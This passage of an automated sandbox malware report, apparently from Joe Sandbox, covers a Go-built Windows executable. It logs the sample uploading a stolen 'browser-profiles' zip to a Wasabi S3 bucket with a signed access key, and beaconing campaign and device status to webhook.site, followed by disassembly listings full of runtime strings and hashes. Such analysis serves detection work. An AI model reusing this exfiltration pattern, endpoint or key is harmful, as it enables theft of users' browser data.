            2024-08-22 13:39:41 UTC10234OUTData Raw: 07 5d 07 d8 df 09 f6 03 a9 ee 1b 07 e7 c3 5e ba 6b f0 9d 79 95 ad bc ff 03 91 54 78 5e 79 cd 6b f9 6b 9d c4 eb cc 58 7f 6d 92 55 a8 f3 35 56 75 8e fb 98 fb 5e a4 8f 99 f8 98 42 bd 56 e0 80 66 4e 12 7b 2c c6 09 71 0f 6e f8 df 42 80 07 32 02 80 e7 7f 10 bd 73 05 90 ef e9 60 fc 31 3e 9c 03 c4 78 3b 87 f7 e1 3a c3 9e 68 85 4c 75 83 e1 ec 43 34 42 c2 ba 41 eb 39 94 3b 4a bf c8 8d 2c 49 f6 39 8d 90 77 8e fc f9 88 ed c6 75 63 f6 5b 31 6e 2e 8c ed c8 54 13 18 b9 c3 4c 2c 81 96 54 f7 09 17 cc c0 8d 03 10 8f 2b 3c 48 35 c3 f8 14 0b 18 b5 d7 0b 46 2e 9e 02 fd 6c 65 40 3f 88 6a 3d c5 3e 1f ea 58 dd 30 28 1f 0e b0 e4 83 b8 27 8a 90 24 d1 94 88 7e e4 8f be 37 02 25 17 ba b5 72 24 3d 3f 61 ec 18 06 1a d3 60 a0 e2 50 2b f0 82 cf 51 fa 12 b5 fc a8 15 fc bd d6 8d 4f b5 c2
            Data Ascii: ]^kyTx^ykkXmU5Vu^BVfN{,qnB2s`1>x;:hLuC4BA9;J,I9wuc[1n.TL,T+<H5F.le@?j=>X0('$~7%r$=?a`P+QO
            2024-08-22 13:39:42 UTC422INHTTP/1.1 200 OK
            Connection: close
            Date: Thu, 22 Aug 2024 13:39:42 GMT
            ETag: "4ed247cc207dcc0d61fd0cf12896d59e"
            Server: WasabiS3/7.20.2957-2024-08-05-c5ee44c55d (head5)
            x-amz-id-2: IAUkAtHBJPcA4vWhbmNB0RLmr9ocT/zT4fbMdDejRpGfmyzZHwCBb5a1yhFYySCQd6JWLkqri2jd
            x-amz-request-id: D31C7C36CDE4CF05:A
            x-wasabi-cm-reference-id: 1724333980595 154.18.200.102 ConID:209766445/EngineConID:2013642/Core:90
            Content-Length: 0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            5192.168.2.749715154.18.200.1024437564C:\Users\user\Desktop\file.exe
            TimestampBytes transferredDirectionData
            2024-08-22 13:39:43 UTC734OUTPOST /browser-profiles/20240822093937-19882742-CC56-1A59-9779-FB8CBFA1E29D.zip?uploadId=Ee0L69Fsbnl2DIafL29HP6-TgJNxOOr1DYqImM_STgfVcBDub2OcNG-UV5TvF65k7r3QeCTgxwqK-iVhXES85dRSMEQLe1J0NQHUVQqfbBqcsNqUTvcAaqJe3k7pKnyq HTTP/1.1
            Host: s3.ap-southeast-1.wasabisys.com
            User-Agent: aws-sdk-go/1.55.5 (go1.22.6; windows; 386)
            Content-Length: 193
            Authorization: AWS4-HMAC-SHA256 Credential=28JW7MUJ64BNM9GCHFBF/20240822/ap-southeast-1/s3/aws4_request, SignedHeaders=content-length;host;x-amz-content-sha256;x-amz-date, Signature=121caa766f3d37ef676b61f8d2c1b9d5e905d163fe138aa5e83732dd4b485738
            X-Amz-Content-Sha256: 992bf866a2bd8eb4ccc8b1e5418a78a31b23cc73f96026ec42f43bf661c345b2
            X-Amz-Date: 20240822T133941Z
            Accept-Encoding: gzip
            2024-08-22 13:39:43 UTC193OUTData Raw: 3c 43 6f 6d 70 6c 65 74 65 4d 75 6c 74 69 70 61 72 74 55 70 6c 6f 61 64 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 73 33 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 2f 64 6f 63 2f 32 30 30 36 2d 30 33 2d 30 31 2f 22 3e 3c 50 61 72 74 3e 3c 45 54 61 67 3e 26 23 33 34 3b 34 65 64 32 34 37 63 63 32 30 37 64 63 63 30 64 36 31 66 64 30 63 66 31 32 38 39 36 64 35 39 65 26 23 33 34 3b 3c 2f 45 54 61 67 3e 3c 50 61 72 74 4e 75 6d 62 65 72 3e 31 3c 2f 50 61 72 74 4e 75 6d 62 65 72 3e 3c 2f 50 61 72 74 3e 3c 2f 43 6f 6d 70 6c 65 74 65 4d 75 6c 74 69 70 61 72 74 55 70 6c 6f 61 64 3e
            Data Ascii: <CompleteMultipartUpload xmlns="http://s3.amazonaws.com/doc/2006-03-01/"><Part><ETag>&#34;4ed247cc207dcc0d61fd0cf12896d59e&#34;</ETag><PartNumber>1</PartNumber></Part></CompleteMultipartUpload>
            2024-08-22 13:39:44 UTC423INHTTP/1.1 200 OK
            Connection: close
            Content-Type: application/xml
            Date: Thu, 22 Aug 2024 13:39:44 GMT
            Server: WasabiS3/7.20.2957-2024-08-05-c5ee44c55d (R107-U12)
            x-amz-id-2: Sv4lYaHyfkv0cH7UFqgFuwj5SuDErAu4YPrIboZ5fC3iSgwtWLd/WNdlUbNyOzTsmya67XqobUpG
            x-amz-request-id: 112DA533D5353512:A
            x-wasabi-cm-reference-id: 1724333983276 154.18.200.102 ConID:209767184/EngineConID:2001822/Core:96
            Transfer-Encoding: chunked
            2024-08-22 13:39:44 UTC453INData Raw: 31 62 39 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 43 6f 6d 70 6c 65 74 65 4d 75 6c 74 69 70 61 72 74 55 70 6c 6f 61 64 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 73 33 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 2f 64 6f 63 2f 32 30 30 36 2d 30 33 2d 30 31 2f 22 3e 3c 4c 6f 63 61 74 69 6f 6e 3e 68 74 74 70 73 3a 2f 2f 73 33 2e 61 70 2d 73 6f 75 74 68 65 61 73 74 2d 31 2e 77 61 73 61 62 69 73 79 73 2e 63 6f 6d 2f 62 72 6f 77 73 65 72 2d 70 72 6f 66 69 6c 65 73 2f 32 30 32 34 30 38 32 32 30 39 33 39 33 37 2d 31 39 38 38 32 37 34 32 2d 43 43 35 36 2d 31 41 35 39 2d 39 37 37 39 2d 46 42 38 43 42 46 41 31 45 32 39 44 2e 7a 69 70 3c 2f 4c 6f 63 61 74 69 6f 6e
            Data Ascii: 1b9<?xml version="1.0" encoding="UTF-8"?><CompleteMultipartUploadResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/"><Location>https://s3.ap-southeast-1.wasabisys.com/browser-profiles/20240822093937-19882742-CC56-1A59-9779-FB8CBFA1E29D.zip</Location


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            6192.168.2.749718178.63.67.1534437564C:\Users\user\Desktop\file.exe
            TimestampBytes transferredDirectionData
            2024-08-22 13:39:45 UTC183OUTPOST /efe6628a-60cc-4d7a-bd08-479e31e08de5 HTTP/1.1
            Host: webhook.site
            User-Agent: Go-http-client/1.1
            Content-Length: 319
            Content-Type: application/json
            Accept-Encoding: gzip
            2024-08-22 13:39:45 UTC319OUTData Raw: 7b 22 63 61 6d 70 61 69 67 6e 5f 69 64 22 3a 22 41 44 54 59 30 30 30 31 22 2c 22 64 65 76 69 63 65 5f 69 64 22 3a 22 31 39 38 38 32 37 34 32 2d 43 43 35 36 2d 31 41 35 39 2d 39 37 37 39 2d 46 42 38 43 42 46 41 31 45 32 39 44 22 2c 22 65 72 72 6f 72 22 3a 22 22 2c 22 6f 73 5f 76 65 72 73 69 6f 6e 22 3a 22 57 69 6e 64 6f 77 73 20 31 30 20 31 30 2e 30 2e 31 39 30 34 35 22 2c 22 73 65 73 73 69 6f 6e 5f 69 64 22 3a 22 38 36 63 35 36 62 32 36 2d 35 36 64 36 2d 34 63 64 38 2d 61 62 33 32 2d 39 64 64 64 31 39 32 36 64 34 66 37 22 2c 22 73 74 61 74 65 22 3a 22 55 70 6c 6f 61 64 69 6e 67 20 66 69 6c 65 73 20 63 6f 6d 70 6c 65 74 65 64 22 2c 22 74 69 6d 65 73 74 61 6d 70 22 3a 31 37 32 34 33 33 33 39 38 33 2c 22 75 73 65 72 5f 64 61 74 61 5f 70 61 74 68 22 3a 22 43
            Data Ascii: {"campaign_id":"ADTY0001","device_id":"19882742-CC56-1A59-9779-FB8CBFA1E29D","error":"","os_version":"Windows 10 10.0.19045","session_id":"86c56b26-56d6-4cd8-ab32-9ddd1926d4f7","state":"Uploading files completed","timestamp":1724333983,"user_data_path":"C
            2024-08-22 13:39:45 UTC294INHTTP/1.1 200 OK
            server: nginx
            content-type: text/html; charset=UTF-8
            transfer-encoding: chunked
            x-request-id: f9ffce2e-50c8-4fe7-99e8-d645573ab5c3
            x-token-id: efe6628a-60cc-4d7a-bd08-479e31e08de5
            cache-control: no-cache, private
            date: Thu, 22 Aug 2024 13:39:45 GMT
            connection: close
            2024-08-22 13:39:45 UTC156INData Raw: 39 31 0d 0a 54 68 69 73 20 55 52 4c 20 68 61 73 20 6e 6f 20 64 65 66 61 75 6c 74 20 63 6f 6e 74 65 6e 74 20 63 6f 6e 66 69 67 75 72 65 64 2e 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 68 6f 6f 6b 2e 73 69 74 65 2f 23 21 2f 76 69 65 77 2f 65 66 65 36 36 32 38 61 2d 36 30 63 63 2d 34 64 37 61 2d 62 64 30 38 2d 34 37 39 65 33 31 65 30 38 64 65 35 22 3e 56 69 65 77 20 69 6e 20 57 65 62 68 6f 6f 6b 2e 73 69 74 65 3c 2f 61 3e 2e 0d 0a 30 0d 0a 0d 0a
            Data Ascii: 91This URL has no default content configured. <a href="https://webhook.site/#!/view/efe6628a-60cc-4d7a-bd08-479e31e08de5">View in Webhook.site</a>.0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            7192.168.2.754497178.63.67.1534437564C:\Users\user\Desktop\file.exe
            TimestampBytes transferredDirectionData
            2024-08-22 13:39:47 UTC183OUTPOST /efe6628a-60cc-4d7a-bd08-479e31e08de5 HTTP/1.1
            Host: webhook.site
            User-Agent: Go-http-client/1.1
            Content-Length: 310
            Content-Type: application/json
            Accept-Encoding: gzip
            2024-08-22 13:39:47 UTC310OUTData Raw: 7b 22 63 61 6d 70 61 69 67 6e 5f 69 64 22 3a 22 41 44 54 59 30 30 30 31 22 2c 22 64 65 76 69 63 65 5f 69 64 22 3a 22 31 39 38 38 32 37 34 32 2d 43 43 35 36 2d 31 41 35 39 2d 39 37 37 39 2d 46 42 38 43 42 46 41 31 45 32 39 44 22 2c 22 65 72 72 6f 72 22 3a 22 22 2c 22 6f 73 5f 76 65 72 73 69 6f 6e 22 3a 22 57 69 6e 64 6f 77 73 20 31 30 20 31 30 2e 30 2e 31 39 30 34 35 22 2c 22 73 65 73 73 69 6f 6e 5f 69 64 22 3a 22 38 36 63 35 36 62 32 36 2d 35 36 64 36 2d 34 63 64 38 2d 61 62 33 32 2d 39 64 64 64 31 39 32 36 64 34 66 37 22 2c 22 73 74 61 74 65 22 3a 22 53 63 72 69 70 74 20 63 6f 6d 70 6c 65 74 65 64 22 2c 22 74 69 6d 65 73 74 61 6d 70 22 3a 31 37 32 34 33 33 33 39 38 36 2c 22 75 73 65 72 5f 64 61 74 61 5f 70 61 74 68 22 3a 22 43 3a 5c 5c 55 73 65 72 73 5c
            Data Ascii: {"campaign_id":"ADTY0001","device_id":"19882742-CC56-1A59-9779-FB8CBFA1E29D","error":"","os_version":"Windows 10 10.0.19045","session_id":"86c56b26-56d6-4cd8-ab32-9ddd1926d4f7","state":"Script completed","timestamp":1724333986,"user_data_path":"C:\\Users\
            2024-08-22 13:39:47 UTC294INHTTP/1.1 200 OK
            server: nginx
            content-type: text/html; charset=UTF-8
            transfer-encoding: chunked
            x-request-id: e9208b4f-ce00-4aa0-9492-5f89a8bdf32c
            x-token-id: efe6628a-60cc-4d7a-bd08-479e31e08de5
            cache-control: no-cache, private
            date: Thu, 22 Aug 2024 13:39:47 GMT
            connection: close
            2024-08-22 13:39:47 UTC156INData Raw: 39 31 0d 0a 54 68 69 73 20 55 52 4c 20 68 61 73 20 6e 6f 20 64 65 66 61 75 6c 74 20 63 6f 6e 74 65 6e 74 20 63 6f 6e 66 69 67 75 72 65 64 2e 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 68 6f 6f 6b 2e 73 69 74 65 2f 23 21 2f 76 69 65 77 2f 65 66 65 36 36 32 38 61 2d 36 30 63 63 2d 34 64 37 61 2d 62 64 30 38 2d 34 37 39 65 33 31 65 30 38 64 65 35 22 3e 56 69 65 77 20 69 6e 20 57 65 62 68 6f 6f 6b 2e 73 69 74 65 3c 2f 61 3e 2e 0d 0a 30 0d 0a 0d 0a
            Data Ascii: 91This URL has no default content configured. <a href="https://webhook.site/#!/view/efe6628a-60cc-4d7a-bd08-479e31e08de5">View in Webhook.site</a>.0


            Statistics

            CPU Usage

            Click to jump to process

            Memory Usage

            Click to jump to process

            High Level Behavior Distribution

            Click to dive into process behavior distribution

            System Behavior

            General

            Target ID:0
            Start time:09:39:31
            Start date:22/08/2024
            Path:C:\Users\user\Desktop\file.exe
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\Desktop\file.exe"
            Imagebase:0x780000
            File size:16'807'936 bytes
            MD5 hash:5470A4EF9F9A778DFF7A1376912DDD8F
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:true

            Disassembly

            Reset < >

              Non-executed Functions

              Function 00793320 Relevance: 9.0, Strings: 7, Instructions: 250COMMON
              Download Yara Rule
              Strings
              • ), xrefs: 0079356A
              • runtime: typeBitsBulkBarrier without type/memory/classes/metadata/mspan/free:bytesruntime.SetFinalizer: second argument is gcSweep being done but phase is not GCoffobjects added out of order or overlappingmheap.freeSpanLocked - invalid stack freemheap.freeSpan, xrefs: 00793561
              • but memory size /gc/pauses:seconds because dotdotdotruntime: npages = runtime: range = {index out of rangeruntime: gp: gp=runtime: getg: g=forEachP: not done in async preemptbad manualFreeListruntime: textAddr cleantimers: bad p frames elided..., locked, xrefs: 00793517
              • runtime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime:, xrefs: 00793486, 0079354B
              • runtime: typeBitsBulkBarrier with type bulkBarrierPreWrite: unaligned argumentsrefill of span with free space remaining/cpu/classes/scavenge/assist:cpu-secondsruntime.SetFinalizer: first argument is failed to acquire lock to reset capacitymarkWorkerStop: unkn, xrefs: 00793441, 007934C3
              • of size runtime: p ms clock, nBSSRoots=runtime: P exp.) for minTrigger=GOMEMLIMIT=bad m value, elemsize= freeindex= span.list=, npages = tracealloc( p->status= in status idleprocs= gcwaiting= schedtick= timerslen= mallocing=bad timedivfloat64nan1float64, xrefs: 007934ED
              • with GC progscan missed a gmisaligned maskruntime: min = runtime: inUse=runtime: max = bad panic stackrecovery failedstopm holding pstartm: m has ppreempt SPWRITEmissing mcache?ms: gomaxprocs=randinit missed]morebuf={pc:: no frame (sp=runtime: frame runti, xrefs: 0079346B
              Memory Dump Source
              • Source File: 00000000.00000002.1440676788.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
              • Associated: 00000000.00000002.1440658485.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000000BC1000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001138000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000114E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116A000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116D000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001172000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001177000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001193000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000119B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441537506.0000000001395000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441556835.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441574120.0000000001398000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441592263.0000000001399000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441606859.000000000139B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441624849.000000000139C000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441648858.00000000013C6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441665201.00000000013C8000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441682753.00000000013C9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441702343.00000000013D1000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013D2000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013DD000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.0000000001415000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.000000000141A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.0000000001426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.00000000014D7000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441993454.00000000016E5000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1442007238.00000000016E6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_780000_file.jbxd
              Similarity
              • API ID:
              • String ID: but memory size /gc/pauses:seconds because dotdotdotruntime: npages = runtime: range = {index out of rangeruntime: gp: gp=runtime: getg: g=forEachP: not done in async preemptbad manualFreeListruntime: textAddr cleantimers: bad p frames elided..., locked$ of size runtime: p ms clock, nBSSRoots=runtime: P exp.) for minTrigger=GOMEMLIMIT=bad m value, elemsize= freeindex= span.list=, npages = tracealloc( p->status= in status idleprocs= gcwaiting= schedtick= timerslen= mallocing=bad timedivfloat64nan1float64$ with GC progscan missed a gmisaligned maskruntime: min = runtime: inUse=runtime: max = bad panic stackrecovery failedstopm holding pstartm: m has ppreempt SPWRITEmissing mcache?ms: gomaxprocs=randinit missed]morebuf={pc:: no frame (sp=runtime: frame runti$)$runtime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime:$runtime: typeBitsBulkBarrier with type bulkBarrierPreWrite: unaligned argumentsrefill of span with free space remaining/cpu/classes/scavenge/assist:cpu-secondsruntime.SetFinalizer: first argument is failed to acquire lock to reset capacitymarkWorkerStop: unkn$runtime: typeBitsBulkBarrier without type/memory/classes/metadata/mspan/free:bytesruntime.SetFinalizer: second argument is gcSweep being done but phase is not GCoffobjects added out of order or overlappingmheap.freeSpanLocked - invalid stack freemheap.freeSpan
              • API String ID: 0-444383925
              • Opcode ID: 64bd5c66faf9aeaaea15056486a9ab475d32be8eb9344b4c51855fd35e53570a
              • Instruction ID: b683eb46083b1a175e46cd06471a364ce71b1ecac023148f024a9c29934b754d
              • Opcode Fuzzy Hash: 64bd5c66faf9aeaaea15056486a9ab475d32be8eb9344b4c51855fd35e53570a
              • Instruction Fuzzy Hash: 38A149B5909709CFC300EF18C48425ABBE1FF88714F56892DE89897312DB74EA45DB93
              Function 00793F7B Relevance: 2.7, Strings: 2, Instructions: 164COMMON
              Download Yara Rule
              Strings
              • bad summary dataruntime: addr = runtime: base = runtime: head = timeBeginPeriod, xrefs: 007AF975
              • @, xrefs: 007AF85E
              Memory Dump Source
              • Source File: 00000000.00000002.1440676788.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
              • Associated: 00000000.00000002.1440658485.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000000BC1000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001138000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000114E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116A000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116D000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001172000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001177000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001193000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000119B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441537506.0000000001395000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441556835.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441574120.0000000001398000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441592263.0000000001399000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441606859.000000000139B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441624849.000000000139C000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441648858.00000000013C6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441665201.00000000013C8000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441682753.00000000013C9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441702343.00000000013D1000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013D2000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013DD000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.0000000001415000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.000000000141A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.0000000001426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.00000000014D7000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441993454.00000000016E5000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1442007238.00000000016E6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_780000_file.jbxd
              Similarity
              • API ID:
              • String ID: @$bad summary dataruntime: addr = runtime: base = runtime: head = timeBeginPeriod
              • API String ID: 0-1191861649
              • Opcode ID: 0976e7fd1b5b8963473ff969bea996d8e3cb22cdc2621a28dba79089597cffec
              • Instruction ID: b99952b1db78fb0b4ae06692cd2917eeb549a3639d02085823e0a6a17c4451cb
              • Opcode Fuzzy Hash: 0976e7fd1b5b8963473ff969bea996d8e3cb22cdc2621a28dba79089597cffec
              • Instruction Fuzzy Hash: 925193756193058FD308DF58C88121AB7E1EBC8314F48CA2DF999D7381EA78ED45CB86
              Function 007A14C0 Relevance: 2.6, Strings: 2, Instructions: 88COMMON
              Download Yara Rule
              Strings
              • ,, xrefs: 007A15AA
              • gcmarknewobject called while doing checkmarkactive sweepers found at start of mark phaseno P available, write barriers are forbiddencompileCallback: float results not supportedcannot trace user goroutine on its own stackunsafe.Slice: ptr is nil and len is not , xrefs: 007A15A1
              Memory Dump Source
              • Source File: 00000000.00000002.1440676788.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
              • Associated: 00000000.00000002.1440658485.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000000BC1000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001138000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000114E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116A000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116D000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001172000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001177000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001193000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000119B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441537506.0000000001395000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441556835.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441574120.0000000001398000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441592263.0000000001399000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441606859.000000000139B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441624849.000000000139C000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441648858.00000000013C6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441665201.00000000013C8000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441682753.00000000013C9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441702343.00000000013D1000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013D2000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013DD000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.0000000001415000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.000000000141A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.0000000001426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.00000000014D7000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441993454.00000000016E5000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1442007238.00000000016E6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_780000_file.jbxd
              Similarity
              • API ID:
              • String ID: ,$gcmarknewobject called while doing checkmarkactive sweepers found at start of mark phaseno P available, write barriers are forbiddencompileCallback: float results not supportedcannot trace user goroutine on its own stackunsafe.Slice: ptr is nil and len is not
              • API String ID: 0-2682900153
              • Opcode ID: 9f777fa269c152430f32575f28433aa0da17809b99429ea40719caabfc9a4811
              • Instruction ID: a9190ee0074556c8c1a143f23281648fd4b0b7b602acd4c955704f56143addf5
              • Opcode Fuzzy Hash: 9f777fa269c152430f32575f28433aa0da17809b99429ea40719caabfc9a4811
              • Instruction Fuzzy Hash: 78318E75A457568FD305DF18C480A6AF7E1BBC6608F4885BDDC484F387CB35984ACB85
              Function 007B03A0 Relevance: .5, Instructions: 477COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.1440676788.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
              • Associated: 00000000.00000002.1440658485.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000000BC1000.00000002.00000001.01000000.00000003.sdmpDownload File
